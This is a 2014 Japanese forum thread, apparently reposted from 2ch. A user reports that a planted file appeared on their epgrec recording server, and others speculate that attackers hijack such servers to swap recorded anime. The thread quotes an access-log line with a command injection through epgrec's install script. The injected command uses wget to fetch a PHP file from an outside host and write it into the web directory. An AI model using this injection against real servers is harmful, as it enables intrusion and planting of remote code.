14/01/17 19:41:56.03 LOQGxUho0 BE:727913142-2BP(1919)
sssp://img.2ch.net/ico/kodomona.gif
ソース
45 名前:login:Penguin:2014/01/16(木) 20:45:36.60 ID:TMxEKoMu
うわ最悪、epgrecに変なファイル置かれた…。
パスワード認証もかけてたんだけどどこから入ったんだろう…。
46 名前:login:Penguin:2014/01/16(木) 21:00:58.77 ID:TMxEKoMu
と思ったらドメイン経由だとかかってたけどIPアドレス直打ちだとかかってなかった
87.181.247.107 - - [12/Jan/2014:17:51:44 +0900] "GET /epgrec/install/step5.php?script=;wget%20-4%20-O%20/home/(ユーザー名)/public_html/epgrec/thumbs/tv.php%20URLリンク(gesopls.de) HTTP/1.1" 200 148
"-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
49 名前:login:Penguin:2014/01/17(金) 05:48:54.17 ID:R+FZTsYf
>>46のドメインでぐぐったら URLリンク(gesopls.de) とか出てきた
もしかしてアニメのts確保するために乗っ取ってるのかな?
↓
URLリンク(gesopls.de) には IRC チャンネルのアドレスが書いてある
> #SleepingKitties@irc.rizon.net
↓
SleepingKittiesでググると様々なアニメをアップロード
URLリンク(www.nyaa.se)
※現在は SleepingKitties の名前は使っていない
↓
アップロード者のファイル一覧(URLリンク(www.nyaa.se))を見ると KHB(宮城) KTK(石川) TBS(関東) MBS(関西) など、
録画している範囲は全国に及ぶ→個人では不可能…
→つまり脆弱な epgrec を乗っ取り仲間内で録画したtsファイルを交換している?